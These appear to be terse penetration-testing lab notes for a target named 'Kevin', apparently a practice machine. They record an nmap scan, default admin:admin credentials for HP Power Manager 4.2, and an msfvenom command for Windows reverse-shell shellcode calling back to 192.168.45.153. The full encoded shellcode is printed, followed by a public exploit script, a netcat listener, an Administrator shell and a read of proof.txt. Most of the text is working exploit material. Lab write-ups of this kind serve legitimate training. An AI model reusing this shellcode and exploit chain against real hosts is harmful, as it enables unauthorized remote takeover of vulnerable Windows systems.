Kevin 192.168.226.45

nmap -p- -A -T4 -sC 192.168.226.45

http://192.168.226.45/index.asp
admin:admin

HP Power Manager 4.2

To generate code
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.153 LPORT=80 -f c -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed

generated code past uner "
"n00bn00b"
"\x89\xe3\xd9\xe1\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x79\x6c\x4a\x48\x6d\x52\x77\x70\x37\x70\x53"
"\x30\x45\x30\x6d\x59\x4a\x45\x56\x51\x4f\x30\x42\x44\x6e"
"\x6b\x70\x50\x66\x50\x4e\x6b\x51\x42\x36\x6c\x6c\x4b\x43"
"\x62\x64\x54\x6e\x6b\x73\x42\x77\x58\x76\x6f\x78\x37\x52"
"\x6a\x61\x36\x75\x61\x59\x6f\x6c\x6c\x75\x6c\x43\x51\x53"
"\x4c\x73\x32\x54\x6c\x65\x70\x69\x51\x7a\x6f\x76\x6d\x75"
"\x51\x6f\x37\x7a\x42\x7a\x52\x42\x72\x51\x47\x6e\x6b\x50"
"\x52\x72\x30\x4e\x6b\x50\x4a\x77\x4c\x6c\x4b\x62\x6c\x57"
"\x61\x74\x38\x4d\x33\x31\x58\x57\x71\x4b\x61\x53\x61\x6e"
"\x6b\x33\x69\x37\x50\x35\x51\x59\x43\x4e\x6b\x43\x79\x76"
"\x78\x48\x63\x75\x6a\x70\x49\x4c\x4b\x76\x54\x4e\x6b\x55"
"\x51\x79\x46\x65\x61\x79\x6f\x4e\x4c\x4a\x61\x4a\x6f\x36"
"\x6d\x53\x31\x58\x47\x74\x78\x49\x70\x63\x45\x59\x66\x67"
"\x73\x61\x6d\x7a\x58\x67\x4b\x63\x4d\x36\x44\x64\x35\x78"
"\x64\x42\x78\x6e\x6b\x51\x48\x65\x74\x63\x31\x6e\x33\x71"
"\x76\x4e\x6b\x46\x6c\x50\x4b\x6c\x4b\x32\x78\x37\x6c\x53"
"\x31\x6e\x33\x4c\x4b\x37\x74\x4e\x6b\x75\x51\x6e\x30\x4b"
"\x39\x42\x64\x54\x64\x31\x34\x51\x4b\x43\x6b\x63\x51\x63"
"\x69\x62\x7a\x30\x51\x6b\x4f\x79\x70\x53\x6f\x51\x4f\x72"
"\x7a\x6e\x6b\x46\x72\x78\x6b\x6c\x4d\x31\x4d\x62\x48\x45"
"\x63\x64\x72\x67\x70\x67\x70\x65\x38\x61\x67\x63\x43\x75"
"\x62\x73\x6f\x56\x34\x65\x38\x30\x4c\x42\x57\x35\x76\x64"
"\x47\x59\x6f\x4e\x35\x6e\x58\x7a\x30\x73\x31\x73\x30\x63"
"\x30\x35\x79\x6f\x34\x61\x44\x66\x30\x72\x48\x56\x49\x4d"
"\x50\x30\x6b\x55\x50\x69\x6f\x7a\x75\x36\x30\x52\x70\x72"
"\x70\x66\x30\x73\x70\x66\x30\x67\x30\x32\x70\x42\x48\x48"
"\x6a\x56\x6f\x39\x4f\x79\x70\x59\x6f\x4b\x65\x6c\x57\x52"
"\x4a\x45\x55\x42\x48\x4b\x70\x4f\x58\x56\x4d\x6f\x69\x31"
"\x78\x73\x32\x45\x50\x75\x50\x46\x30\x4d\x59\x48\x66\x30"
"\x6a\x64\x50\x52\x76\x42\x77\x75\x38\x6e\x79\x59\x35\x54"
"\x34\x71\x71\x79\x6f\x6a\x75\x4f\x75\x6b\x70\x54\x34\x74"
"\x4c\x79\x6f\x30\x4e\x54\x48\x74\x35\x5a\x4c\x55\x38\x78"
"\x70\x48\x35\x6f\x52\x73\x66\x6b\x4f\x4a\x75\x51\x78\x62"
"\x43\x30\x6d\x61\x74\x43\x30\x4b\x39\x48\x63\x42\x77\x66"
"\x37\x52\x77\x54\x71\x79\x66\x31\x7a\x44\x52\x31\x49\x71"
"\x46\x6b\x52\x49\x6d\x65\x36\x38\x47\x31\x54\x77\x54\x65"
"\x6c\x66\x61\x67\x71\x6e\x6d\x71\x54\x66\x44\x72\x30\x69"
"\x56\x33\x30\x32\x64\x76\x34\x36\x30\x56\x36\x36\x36\x51"
"\x46\x43\x76\x53\x66\x32\x6e\x73\x66\x52\x76\x31\x43\x61"
"\x46\x43\x58\x44\x39\x4a\x6c\x55\x6f\x4b\x36\x59\x6f\x78"
"\x55\x6e\x69\x49\x70\x42\x6e\x56\x36\x72\x66\x4b\x4f\x46"
"\x50\x30\x68\x53\x38\x6d\x57\x55\x4d\x71\x70\x4b\x4f\x79"
"\x45\x6d\x6b\x68\x70\x6d\x65\x6e\x42\x30\x56\x53\x58\x49"
"\x36\x6c\x55\x4f\x4d\x4d\x4d\x79\x6f\x68\x55\x65\x6c\x74"
"\x46\x33\x4c\x77\x7a\x4b\x30\x69\x6b\x4b\x50\x53\x45\x54"
"\x45\x6f\x4b\x32\x67\x45\x43\x33\x42\x70\x6f\x73\x5a\x73"
"\x30\x72\x73\x4b\x4f\x6e\x35\x41\x41")

python2 10099.py 192.168.226.45
nc -nvlp 80

got Administration Shell
whoami
cd C:\Users\Administrator\Desktop
more proof.txt

